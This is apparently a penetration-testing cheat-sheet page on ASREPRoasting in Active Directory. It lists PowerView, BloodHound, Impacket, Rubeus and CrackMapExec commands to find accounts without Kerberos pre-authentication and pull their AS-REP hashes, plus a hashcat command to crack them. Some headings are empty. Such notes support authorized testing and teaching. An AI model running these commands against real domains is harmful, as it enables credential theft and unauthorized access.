search
githubEdit

ASREPRoast

hashtag
ASREPRoast

hashtag
Tools: Rubeus , Impacket-GetNPUsers

hashtag
ASREPRoast

hashtag
Find ASREPRoastable users (need creds)

1) Powerview

Get-DomainUser -PreauthNotRequired -Properties SamAccountName

2) Bloodhound Cypher Query

MATCH(u:User {dontreqpreauth:true}). (c:Computer). p=shortestPath((u)-[*1..]->(c)) RETURN p

hashtag
Find ASREP hash

Impacket-GetNPUsers DOMAIN/ -usersfile USERNAMES.TXT -format hashcat -dc-ip DC_IP -dc-host DC.DOMAIN.LOCAL -outputfile HASHES.DOMAIN.TXT

Rubeus.exe asreproast /format:hashcat

hashtag
Occurs when a user account has the privilege "Does not require Pre-Authentication" set.

hashtag
This means the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

hashtag
Requirements:

hashtag
Accounts with the attribute DONT_REQ_PREAUTH ( PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose )

hashtag
You can also do:

1) Gather domain accounts in a list

2)

hashtag
Enumeration (Need domain credentials)

hashtag
Windows

hashtag
Linux

hashtag
Method: Impacket GetNPUsers

Enumerate Users

Request AS-REP

It is possible to force DES if it is allowed.

hashtag
Alternate Method: CrackMapExec

  • crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asrep

hashtag
Alternate Method: ASREPRoast powershell module https://github.com/HarmJ0y/ASREPRoast

  • Get-ASREPHash -Username VPN114user -verbose

hashtag
More tools:

1) Snaffler

2) Lazagne

3) Seatbelt

hashtag
Asreproasting

Command
Description

.\Rubeus.exe asreproast /outfile:asrep.txt

Used to perform the Asreproast attack and save the extracted tickets to a file.

hashcat -m 18200 -a 0 asrep.txt passwords.txt --force

Uses hashcat to crack AS-REP hashes that were saved in a file.

PreviousValid Username OnlyNextBlind Kerberoasting

Last updated